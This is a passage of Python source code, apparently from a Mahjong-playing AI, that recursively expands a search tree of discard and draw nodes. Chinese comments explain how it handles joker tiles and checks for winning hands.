(self.xts) * 2:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n # 当ocards为空时,分支为其中一个2N或者kingCard\n if ocards == []:\n # 分支1:t2N添加到ocards中\n if t2N != []:\n\n # _,t2Nw = self.get_effective_cards_w(t2N)\n # min_w_set=[]\n # min_w=min(t2Nw)\n # for i in range(len(t2N)):\n # if t2Nw[i]==min_w:\n # min_w_set.append(t2N[i])\n # for t2 in min_w_set:\n # ocardsCP = copy.copy(t2)\n # t2NCP = copy.deepcopy(t2N)\n # t2NCP.remove(t2)\n # # 更新了ocards,t2N\n # 全遍历,将所有2N轮流加入到ocards中\n for t2 in t2N:\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2)\n ocardsCP = copy.copy(ocards)\n ocardsCP.extend(t2)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz)\n # 分支2 :kingCard加入到ocards中\n if kingNum != 0:\n # 当有ab/ac时,不出宝牌\n # for t2 in t2N:\n # if t2[0]+2==t2[1]:\n # return\n\n ocardsCPaddKing = [self.kingCard]\n # print (ocardsCPaddKing)\n self.expandNode(node, ocardsCPaddKing, t2N, kingNum=kingNum - 1, kz=kz, sz=sz)\n # 结束分支\n return\n # 胡牌多宝时,将宝放入ocards中,看是否宝吊\n # elif kingNum >= 2:\n # ocards_KingMore2 = copy.copy(ocards)\n # ocards_KingMore2.append(self.kingCard)\n # self.expandNode(node, ocards_KingMore2, t2N, kingNum=kingNum - 1, baoHuanYuan=baoHuanYuan, kz=kz, sz=sz)\n # return\n else:\n ocardsTMP = copy.copy(ocards)\n # t2NCP = t2N\n\n # 极小值出牌 merit 加快搜索树效率,可能会导致遗漏部分情况\n # min_ocards_w=[]\n # for tile in ocardsTMP:\n # min_ocards_w.append(self.minList[convert_hex2index(tile)])\n # min_ocards=[]\n # min_w=min(min_ocards_w)\n #\n # for i in range(len(min_ocards_w)):\n # if min_ocards_w[i]==min_w:\n # min_ocards.append(ocardsTMP[i])\n\n # ocardsTMP=min_ocards\n\n for out in ocardsTMP:\n # 已经摸过的牌,不需要再出\n if out in node.formerCatchCards:\n continue\n # if out==self.op_card:\n # continue\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1,\n dgRate=self.dgtable, kingCard=self.kingCard, t2N=t2N, ocards=ocardsCP,\n baoHuanYuan=node.baoHuanYuan)\n\n oNode.feiKingNum = node.feiKingNum\n if out == self.kingCard:\n oNode.feiKingNum += 1\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n # if oNode.jiang!=0:\n self.expandNode(oNode, ocardsCP, t2N, kingNum=kingNum)\n # elif kingNum!=0:\n # 有宝,分为将为宝与宝吊打法\n\n # 抓牌结点\n if node.type == 1:\n\n # 当t2N为空时,分支为将ocards中的一张牌加入到t2N中,或将kingCard加入到t2N中\n if t2N == []:\n # 分支1:将ocards中的一张牌加入到t2N中\n if ocards != []:\n for card in ocards:\n # print ('ocardsCP',ocardsCP)\n t2NCP = [[card]]\n ocardsCP = copy.copy(ocards)\n ocardsCP.remove(card)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz) # continue\n # 分支2 当ocards也为空,但是kingNum不为空时,将kingCard加入到t2N中,这时已经宝吊胡牌了\n if ocards == [] and kingNum != 0:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum - 1, kz=kz, sz=sz)\n return\n\n # 正式处理抓牌结点\n else:\n # ocardsCP = ocards\n t2NCPTMP = t2N\n\n # 极大值抓牌\n # t2Nw=[]\n # for t2 in t2NCPTMP:\n 
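# (editor's note: a hedged sketch, not part of the original logic) If this\n # pruning were re-enabled, each partial set t2 would be scored once via\n # _, w = self.get_effective_cards_w([t2]) and cached in self.t2Nw_Set, and\n # only the maximum-weight sets would be expanded below, trading search\n # completeness for speed.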
#\n # if str(t2) in self.t2Nw_Set.keys():\n # t2Nw.append(self.t2Nw_Set[str(t2)])\n # else:\n # _,w=self.get_effective_cards_w([t2])\n # t2Nw.append(w[0])\n # maxw=max(t2Nw)\n # maxw_t2N=[]\n # for i in range(len(t2NCPTMP)):\n # if t2Nw[i]==maxw:\n # maxw_t2N.append(t2NCPTMP[i])\n\n for t2 in t2NCPTMP:\n # print ('t2NCPTMP',t2NCPTMP)\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n combineCards = self.getEffectiveCards(t2)\n # print ('combineCards',combineCards)\n if combineCards == []:\n pass\n # print('Error combineCards is []')\n else:\n for e in combineCards: # e[0] catchcard e[1] t2N\n # 已经出过的牌,不需要再摸到。这样路径会变长没有意义\n if e[0] in node.formerOutCards:\n continue\n\n # #宝还原,让node的父结点生成一个复制结点\n if kingNum != 0 and e[0] == self.kingCard:\n # nodeCopy = copy.deepcopy(node)\n t2N_BHY = MJ.deepcopy(t2N)\n t2N_BHY.remove(t2)\n oNode = OutNode(cards=node.cards, outCard=node.outCard, level=node.level,\n dgRate=self.dgtable,\n kingCard=self.kingCard, t2N=t2N_BHY, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan + 1)\n # oNode.rate=1\n oNode.feiKingNum = node.feiKingNum\n oNode.kz = copy.copy(node.kz)\n # oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n # oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n\n oNode.setParent(node.parent)\n node.parent.addChild(oNode)\n\n # 更新结点信息 \n\n if len(e[1]) == 2:\n\n t2N_BHY.append(e[1])\n\n elif len(e[1]) == 3:\n\n if e[1][0] == e[1][1]:\n oNode.kz.append(e[1][0])\n oNode.kz.sort()\n else:\n oNode.sz.append(e[1][0])\n oNode.sz.sort()\n self.expandNode(oNode, ocards, t2N_BHY, kingNum=kingNum - 1, kz=[], sz=[])\n continue\n\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], leftNum=self.leftNum, remainNum=self.remainNum,\n t2=t2, level=node.level + 1,\n kingCard=self.kingCard, t2N=t2NCP, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan)\n # todo 可能存在bug\n # if self.xts == 0 and t2NCP == [] and ocardsCP.count(self.kingCard) + kingNum >= 2:\n # cNode.catchCard = self.kingCard\n # cNode.rate = 1\n\n cNode.feiKingNum = node.feiKingNum\n cNode.kz = copy.copy(node.kz)\n cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n cNode.sz.extend(sz)\n cNode.jiang = node.jiang\n\n t2NCP2 = MJ.deepcopy(t2NCP)\n if len(e[1]) == 3:\n if e[1][0] == e[1][1]:\n cNode.kz.append(e[1][0])\n else:\n cNode.sz.append(e[1][0])\n elif len(e[1]) == 2:\n # if e[1][0] == e[1][1]:\n\n t2NCP2.append(e[1])\n\n # 胡牌判断\n # 已胡牌,补充信息\n # kingNumall = ocardsCP.count(self.kingCard) + kingNum\n if len(cNode.kz) + len(cNode.sz) == 4:\n if (len(t2NCP2) == 1 and t2NCP2[0][0] == t2NCP2[0][1]): # 普通无宝胡牌,包括了宝吊(搜索时另一张牌也赋予了宝牌值)的情况\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n cNode.jiang = t2NCP2[0][0]\n\n elif kingNum == 2: # 宝还原 宝做将 胡牌\n # cNode.baoHuanYuan = True\n cNode.jiang = self.kingCard\n # elif self.xts == 0 and kingNumall == 1: # 飞宝后这里会使搜索多一层,todo 这里应该搜索不到吧\n # cNode.jiang = self.kingCard\n\n # 多宝胡牌判断\n kingNum_remain = kingNum\n trans_t2N = []\n if kingNum >= 2:\n # 一张宝做宝吊,其他宝牌做任意牌\n\n useking = kingNum - 1 # 宝吊牌\n\n t3NKz = []\n t3NSz = []\n for i in range(len(t2NCP2)):\n # eFCards = self.getEffectiveCards(t2NCP[i])\n if t2NCP2[i][0] == t2NCP2[i][1]:\n t3NKz.append(t2NCP2[i][0])\n\n else:\n if t2NCP2[i][0] & 0x0f == 8:\n t3NSz.append(t2NCP2[i][0] - 1)\n\n else:\n t3NSz.append(t2NCP2[i][0])\n trans_t2N.append(t2NCP2[i])\n useking -= 1\n\n if useking >= 0:\n # 
上述处理,已经在2N中使用了宝牌变成了3N,所以这里必须有2个以上的宝牌才能凑成3N \n # 由于4宝会直接杠掉,这里不处理\n if useking >= 2:\n # noKingCard = 0\n for card in ocards:\n if card != self.kingCard:\n # noKingCard = card\n if useking - 2 >= 0:\n t3NKz.append(card)\n useking -= 2\n else:\n break\n # if noKingCard != 0:\n # t3NKz.append(noKingCard)\n # useking-=2\n\n if len(cNode.kz) + len(cNode.sz) + len(t3NSz) + len(t3NKz) == 4:\n cNode.kz.extend(t3NKz)\n cNode.sz.extend(t3NSz)\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n # 所有的2N都已用宝牌配完,这里直接置[]\n for t2tmp in trans_t2N:\n t2NCP2.remove(t2tmp)\n kingNum_remain = useking # 填胡了,才将宝牌更新\n\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(cNode.catchCard)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocards, t2NCP2, kingNum=kingNum_remain)\n\n def expandNode_(self, node, ocards, t2N, kingNum=0, baoHuanYuan=False, kz=[], sz=[]):\n # print('expandNode','node.kz,sz,jiang',node.kz,node.sz,node.jiang,'kz,sz',kz,sz,'ocards,t2N',ocards,t2N,'node.cards',node.cards,'node.type,level,rate',node.level,node.type,node.rate)\n\n if node.level >= self.xts * 2: # todo 此处修改为深度为xts ,不再为xts+1\n # if ocards==[] and len(t2N)==1 and t2N[0][0]==t2N[0][1]:\n # 胡牌\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00:\n return\n else:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n if ocards == [] and t2N != []:\n ocardsTMP = t2N[-1]\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2N[-1])\n else:\n ocardsTMP = ocards\n t2NCP = t2N\n for out in ocardsTMP:\n # if out==self.op_card:\n # continue\n\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1, dgRate=self.dgtable,\n kingCard=self.kingCard)\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n self.expandNode(oNode, ocardsCP, t2NCP)\n\n # 抓牌结点\n if node.type == 1:\n # 近胡牌状态,只有2张废牌,另一张做将\n if t2N == [] and len(ocards) == 1:\n t2NCPTMP = [copy.copy(ocards)]\n ocardsCP = []\n elif t2N != []:\n ocardsCP = ocards\n t2NCPTMP = t2N\n else: # todo 无成型的2N抓,现在省略掉了\n # ocardsCP = ocards\n # t2NCPTMP = t2N\n # print('Error expandNode', self.cards, node.cards, ocards, t2N, node.level)\n node.rate = 0\n return\n for t2 in t2NCPTMP:\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n effectiveCards = self.getEffectiveCards(t2)\n if effectiveCards == []:\n pass\n # print('Error effectiveCards is []')\n else:\n for e in effectiveCards:\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], 
leftNum=self.leftNum,\n remainNum=self.remainNum,\n t2=t2, level=node.level + 1, kingCard=self.kingCard)\n cNode.kz = copy.copy(node.kz)\n cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n cNode.sz.extend(sz)\n\n t2tmp = copy.copy(t2)\n t2tmp.append(e)\n t2tmp.sort()\n\n # 已胡牌,这里是补将牌\n if len(t2tmp) == 2:\n cNode.jiang = t2tmp[0]\n elif t2tmp[0] == t2tmp[1]:\n cNode.kz.append(t2tmp[0])\n else:\n cNode.sz.append(t2tmp[0])\n # 已胡牌,这里不是补将牌,补的其他2N\n if len(cNode.kz) + len(cNode.sz) == 4 and ocardsCP == [] and len(t2NCP) == 1 and t2NCP[0][0] == \\\n t2NCP[0][1]:\n # if len(cNode.sz)+len(cNode.kz)!=5:\n # print ('No hu Error',cNode.kz,cNode.sz,ocardsCP,t2NCP,self.cards,self.suits,cNode.level,node.level)\n # if node.kz==[24] and node.sz==[]\n cNode.jiang = t2NCP[0][0]\n # t2NCP=[]\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(e)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocardsCP, t2NCP)\n\n def expandNode(self, node, ocards, t2N, kingNum=0, kz=[], sz=[], xts=14):\n \"\"\"\n 功能:结点扩展方法\n 思路:递归结点扩展,先判断是否已经胡牌,若已经胡牌则停止扩展,再判断是否超过搜索深度,若是则停止扩展\n 对出牌结点进行出牌扩展,直接将出牌集合加入到扩展策略,若本路径的出牌集合已空,则分别将2N或宝牌加入到出牌集合,再次递归。出牌结点创建后需更新所有的出牌结点信息,再次递归\n 对抓牌结点进行抓牌扩展,直接将2N的有效牌加入到抓牌结点,若2N已空,则遍历出牌结点,获取该张牌的邻近牌,加入到2N中,再次递归。抓牌结点创建后,需更新抓牌结点信息,再次递归\n :param node: 本次需扩展的结点\n :param ocards: 出牌集合\n :param t2N: 2N集合\n :param kingNum: 未使用的宝数量\n :param baoHuanYuan: 是否作为宝还原进行扩展\n :param kz: 顺子\n :param sz: 刻子\n :return: 搜索树\n \"\"\"\n # node.nodeInfo()\n\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00 and node.type == 2:\n # #少搜索一层的奖励,×2概率\n # if self.kingNum!=0:\n # if node.level==self.xts*2:\n # node.rate*=2\n # return\n # if node.jiang!=self.kingCard:\n # return\n # else:\n # if ocards==[] and len(t2N)==1 and t2N[0][1]==self.kingCard:\n # return\n return\n\n # 宝吊多一层 \n if self.kingNum > 0 and node.feiKingNum + node.baoHuanYuan < self.kingNum + self.fei_king:\n\n # if node.jiang==self.kingCard:\n if node.level >= (xts + 1) * 2:\n node.rate = 0\n return\n else:\n if node.level >= (xts) * 2:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n # 当ocards为空时,分支为其中一个2N或者kingCard\n\n if ocards == []:\n # 分支1:t2N添加到ocards中\n if t2N != []:\n\n # _,t2Nw = self.get_effective_cards_w(t2N)\n # min_w_set=[]\n # min_w=min(t2Nw)\n # for i in range(len(t2N)):\n # if t2Nw[i]==min_w:\n # min_w_set.append(t2N[i])\n # for t2 in min_w_set:\n # ocardsCP = copy.copy(t2)\n # t2NCP = copy.deepcopy(t2N)\n # t2NCP.remove(t2)\n # self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz,xts=xts)\n\n # # 更新了ocards,t2N\n # 全遍历,将所有2N轮流加入到ocards中\n for t2 in t2N:\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2)\n ocardsCP = copy.copy(ocards)\n ocardsCP.extend(t2)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz, xts=xts)\n # 分支2 :kingCard加入到ocards中\n if kingNum != 0:\n # 当有ab/ac时,不出宝牌\n # for t2 in t2N:\n # if t2[0]+2==t2[1]:\n # return\n\n ocardsCPaddKing = [self.kingCard]\n # print (ocardsCPaddKing)\n self.expandNode(node, ocardsCPaddKing, t2N, kingNum=kingNum - 1, kz=kz, sz=sz, xts=xts)\n # 结束分支\n return\n # 胡牌多宝时,将宝放入ocards中,看是否宝吊\n # elif kingNum >= 2:\n # ocards_KingMore2 = copy.copy(ocards)\n # ocards_KingMore2.append(self.kingCard)\n # 
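\n            # Editor's note (hedged sketch): the depth guard at the top of this method grants one extra draw/discard pair while a joker can still be flown or restored; a standalone reading of that rule:\n            # def depth_bound(xts, king_num, fei_king, flown_or_restored):\n            #     if king_num > 0 and flown_or_restored < king_num + fei_king:\n            #         return 2 * (xts + 1)  # one extra layer for the joker line of play\n            #     return 2 * xts\n            # assert depth_bound(2, 1, 0, 0) == 6 and depth_bound(2, 0, 0, 0) == 4\n            # 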
self.expandNode(node, ocards_KingMore2, t2N, kingNum=kingNum - 1, baoHuanYuan=baoHuanYuan, kz=kz, sz=sz)\n # return\n else:\n ocardsTMP = copy.copy(ocards)\n # t2NCP = t2N\n\n # 极小值出牌 merit 加快搜索树效率,可能会导致遗漏部分情况\n # min_ocards_w=[]\n # for tile in ocardsTMP:\n # min_ocards_w.append(self.minList[convert_hex2index(tile)])\n # min_ocards=[]\n # min_w=min(min_ocards_w)\n #\n # for i in range(len(min_ocards_w)):\n # if min_ocards_w[i]==min_w:\n # min_ocards.append(ocardsTMP[i])\n\n # ocardsTMP=min_ocards\n\n for out in ocardsTMP:\n # 已经摸过的牌,不需要再出\n if out in node.formerCatchCards:\n continue\n # if out==self.op_card:\n # continue\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1,\n dgRate=self.dgtable, kingCard=self.kingCard, t2N=t2N, ocards=ocardsCP,\n baoHuanYuan=node.baoHuanYuan)\n # if oNode.level==1:\n # oNode.firstOutCard=out\n # else:\n # oNode.firstOutCard=node.firstOutCard\n\n oNode.feiKingNum = node.feiKingNum\n if out == self.kingCard:\n oNode.feiKingNum += 1\n if self.kingNum > 1 and kingNum > 1:\n xts += 1\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n # 重复结点检��,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n # if oNode.jiang!=0:\n\n self.expandNode(oNode, ocardsCP, t2N, kingNum=kingNum, xts=xts)\n # elif kingNum!=0:\n # 有宝,分为将为宝与宝吊打法\n\n # 抓牌结点\n if node.type == 1:\n\n # 当t2N为空时,分支为将ocards中的一张牌加入到t2N中,或将kingCard加入到t2N中\n # if t2N==[]:\n # print (t2N)\n if t2N == []:\n # 分支1:将ocards中的一张牌加入到t2N中\n if ocards != []:\n for card in ocards:\n # print ('ocardsCP',ocardsCP)\n t2NCP = [[card]]\n ocardsCP = copy.copy(ocards)\n ocardsCP.remove(card)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, xts=xts) # continue\n # 分支2 当ocards也为空,但是kingNum不为空时,将kingCard加入到t2N中,这时已经宝吊胡牌了\n\n # print ('test',ocards,kingNum,node.jiang)\n if ocards == []:\n if kingNum != 0:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum - 1, xts=xts)\n elif node.jiang == self.kingCard:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum, xts=xts)\n return\n\n # 正式处理抓牌结点\n else:\n # ocardsCP = ocards\n t2NCPTMP = t2N\n\n # 极大值抓牌\n # t2Nw=[]\n # for t2 in t2NCPTMP:\n #\n # if str(t2) in self.t2Nw_Set.keys():\n # t2Nw.append(self.t2Nw_Set[str(t2)])\n # else:\n # _,w=self.get_effective_cards_w([t2])\n # t2Nw.append(w[0])\n # maxw=max(t2Nw)\n # maxw_t2N=[]\n # for i in range(len(t2NCPTMP)):\n # if t2Nw[i]==maxw:\n # maxw_t2N.append(t2NCPTMP[i])\n\n for t2 in t2NCPTMP:\n # print ('t2NCPTMP',t2NCPTMP)\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n combineCards = self.getEffectiveCards(t2)\n # print ('combineCards',combineCards)\n if combineCards == []:\n pass\n # print('Error combineCards is []')\n else:\n for e in combineCards: # e[0] catchcard e[1] t2N\n # 已经出过的牌,不需要再摸到。这样路径会变长没有意义\n if e[0] in node.formerOutCards:\n continue\n\n # #宝还原,让node的父结点生成一个复制结点\n if len(t2) == 2 and e[0] 
== self.kingCard:\n BHY_ocards = copy.copy(ocards)\n BHY_kingNum = kingNum\n if kingNum != 0:\n BHY_kingNum = kingNum - 1\n elif self.kingCard in ocards:\n BHY_ocards.remove(self.kingCard)\n else:\n continue\n # node.nodeInfo()\n\n # nodeCopy = copy.deepcopy(node)\n t2N_BHY = MJ.deepcopy(t2N)\n t2N_BHY.remove(t2)\n oNode = OutNode(cards=node.cards, outCard=node.outCard, level=node.level,\n dgRate=self.dgtable,\n kingCard=self.kingCard, t2N=t2N_BHY, ocards=BHY_ocards,\n baoHuanYuan=node.baoHuanYuan + 1)\n\n # if oNode.level == 1:\n # oNode.firstOutCard = out\n # else:\n oNode.firstOutCard = node.firstOutCard\n\n # oNode.rate=1\n oNode.feiKingNum = node.feiKingNum\n oNode.kz = copy.copy(node.kz)\n # oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n # oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n\n oNode.setParent(node.parent)\n node.parent.addChild(oNode)\n\n # 更新结点信息 \n\n if len(e[1]) == 2:\n\n t2N_BHY.append(e[1])\n\n elif len(e[1]) == 3:\n\n if e[1][0] == e[1][1]:\n oNode.kz.append(e[1][0])\n oNode.kz.sort()\n else:\n oNode.sz.append(e[1][0])\n oNode.sz.sort()\n # oNode.nodeInfo()\n self.expandNode(oNode, BHY_ocards, t2N_BHY, kingNum=BHY_kingNum, kz=[], sz=[], xts=xts)\n continue\n\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], leftNum=self.leftNum, remainNum=self.remainNum,\n t2=t2, level=node.level + 1,\n kingCard=self.kingCard, t2N=t2NCP, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan)\n # todo 可能存在bug\n # if self.xts == 0 and t2NCP == [] and ocardsCP.count(self.kingCard) + kingNum >= 2:\n # cNode.catchCard = self.kingCard\n # cNode.rate = 1\n # if cNode.level == 1:\n # cNode.firstOutCard = out\n # else:\n # cNode.firstOutCard = node.firstOutCard\n cNode.feiKingNum = node.feiKingNum\n cNode.kz = copy.copy(node.kz)\n # cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n # cNode.sz.extend(sz)\n cNode.jiang = node.jiang\n\n t2NCP2 = MJ.deepcopy(t2NCP)\n if len(e[1]) == 3:\n if e[1][0] == e[1][1]:\n cNode.kz.append(e[1][0])\n else:\n cNode.sz.append(e[1][0])\n elif len(e[1]) == 2:\n # if e[1][0] == e[1][1]:\n\n t2NCP2.append(e[1])\n\n # 胡牌判断\n # 已胡牌,补充信息\n # kingNumall = ocardsCP.count(self.kingCard) + kingNum\n if len(cNode.kz) + len(cNode.sz) == 4:\n if (len(t2NCP2) == 1 and t2NCP2[0][0] == t2NCP2[0][1]): # 普通无宝胡牌,包括了宝吊(搜索时另一张牌也赋予了宝牌值)的情况\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n cNode.jiang = t2NCP2[0][0]\n\n elif kingNum == 2: # 宝还原 宝做将 胡牌\n # cNode.baoHuanYuan = True\n cNode.jiang = self.kingCard\n # elif self.xts == 0 and kingNumall == 1: # 飞宝后这里会使搜索多一层,todo 这里应该搜索不到吧\n # cNode.jiang = self.kingCard\n\n # 多宝胡牌判断\n kingNum_remain = kingNum\n trans_t2N = []\n if kingNum >= 2:\n # 一张宝做宝吊,其他宝牌做任意牌\n\n useking = kingNum - 1 # 宝吊牌\n\n t3NKz = []\n t3NSz = []\n for i in range(len(t2NCP2)):\n # eFCards = self.getEffectiveCards(t2NCP[i])\n if t2NCP2[i][0] == t2NCP2[i][1]:\n t3NKz.append(t2NCP2[i][0])\n\n else:\n if t2NCP2[i][0] & 0x0f == 8:\n t3NSz.append(t2NCP2[i][0] - 1)\n\n else:\n t3NSz.append(t2NCP2[i][0])\n trans_t2N.append(t2NCP2[i])\n useking -= 1\n\n if useking >= 0:\n # 上述处理,已经在2N中使用了宝牌变成了3N,所以这里必须有2个以上的宝牌才能凑成3N \n # 由于4宝会直接杠掉,这里不处理\n if useking >= 2:\n # noKingCard = 0\n for card in ocards:\n if card != self.kingCard:\n # noKingCard = card\n if useking - 2 >= 0:\n t3NKz.append(card)\n useking -= 2\n else:\n break\n # if noKingCard != 0:\n 
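# Editor's note (sketch): the acceptance test below counts natural and joker-completed sets together; a standard hand is four sets plus a pair, so a minimal check reduces to:\n                                # def is_standard_win(n_kz, n_sz, n_joker_kz, n_joker_sz, jiang):\n                                #     return n_kz + n_sz + n_joker_kz + n_joker_sz == 4 and jiang != 0\n                                # assert is_standard_win(2, 1, 1, 0, 0x07) and not is_standard_win(2, 1, 0, 0, 0x07)\n                                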
# t3NKz.append(noKingCard)\n # useking-=2\n\n if len(cNode.kz) + len(cNode.sz) + len(t3NSz) + len(t3NKz) == 4:\n cNode.kz.extend(t3NKz)\n cNode.sz.extend(t3NSz)\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n # 所有的2N都已用宝牌配完,这里直接置[]\n for t2tmp in trans_t2N:\n t2NCP2.remove(t2tmp)\n kingNum_remain = useking + 1 # 填胡了,才将宝牌更新 todo 忘了加1\n\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(cNode.catchCard)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocards, t2NCP2, kingNum=kingNum_remain, xts=xts)\n\n def generateTree(self):\n \"\"\"\n 功能:搜索树创建,用于初始化路径的相关变量,包括出牌集合 抓牌集合2N 顺子 刻子等\n 思路:使用了组合信息进行创建和扩展树,将3N直接加入到结点信息中,不再处理,将2N加入到抓牌结点扩展策略集合中,将孤张leftCards加入到出牌结点扩展策略中\n 并增加了宝还原处理\n \"\"\"\n # if self.type==2:\n # node = self.root\n # else:#扩展了op中的结点\n # node=self.root.children[0]\n\n node = self.root\n for a in self.all:\n # t2N = copy.deepcopy(a[2] + a[3])\n # efc_cards, t2_w = self.get_effective_cards_w(t2N)\n #\n # for i in range(len(t2N)):\n # if str(t2N[i]) not in self.t2Nw_Set.keys():\n # self.t2Nw_Set[str(t2N[i])]=t2_w[i]\n # t2N[i].append(t2_w[i])\n #\n # t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2], 